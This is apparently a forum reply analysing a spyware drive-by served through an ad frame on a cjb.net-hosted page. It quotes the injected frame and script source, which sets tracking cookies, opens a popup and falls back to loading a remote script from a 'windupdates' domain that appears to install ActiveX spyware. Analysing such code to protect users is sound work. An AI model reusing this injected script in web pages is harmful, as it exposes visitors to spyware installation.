dadiOH said:
When my registry monitor popped up when I loaded the page telling me
that the program was registering itself to start at boot time (can't
stop it doing so, deny permission and it just keeps on trying). And the
new directory: C:\Windows\Windows Control Ad (or some such). Can't
disable the startup from MSCONFIG because the program is running and
monitors same...uncheck it and it just writes a new entry.
It has an uninstall in add/remove programs but doesn't uninstall
completely. Seems to bugger AdAware too if not uninstalled before
running AdAware. After uninstalling AdAware cleans it up OK.
Got the same garbage from another cjb.net page a few days ago...a page
that I *know* used to be clean.
Thanks for explaining the story. Makes me glad for my browsers!
In Kmeleon, the source shows 100% clean. In MSIE, differently, I dug out
that there is an extra frame showing up in the source text.
<frame src="
http://www.utopiatemple.com/tutils/tdel.htm">
<frame src="
http://ads.cjbmanagement.com/frame/1103053443">
MSIE does not load that second frame for me visibly in any way. So I had
to launch it manually. I get empty, blank display (since active scripting
is set to a default of disabled). Source -
<script>
document.cookie="1103053676=gator;path=/";
document.cookie="gator=1103053676;path=/;expires="+new Date(new
Date().getTime()+604800000).toGMTString();
window1103053676=window.open('
http://ads.cjbmanagement.com/window/1103053676'
[...]
if(window1103053676==null)document.write('<script
src="
http://static.windupdates.com/prompts/a770ac7b/a072aa.js"><\/script>');
</script>
That must be the start point to the nasty in there, something that is led
to soon after - the spyware you speak of evidently uses Active-X controls.
Couldn't really explore much from there, garbage chars come out for source.
And no, definitely would not be interested in experiencing it directly.
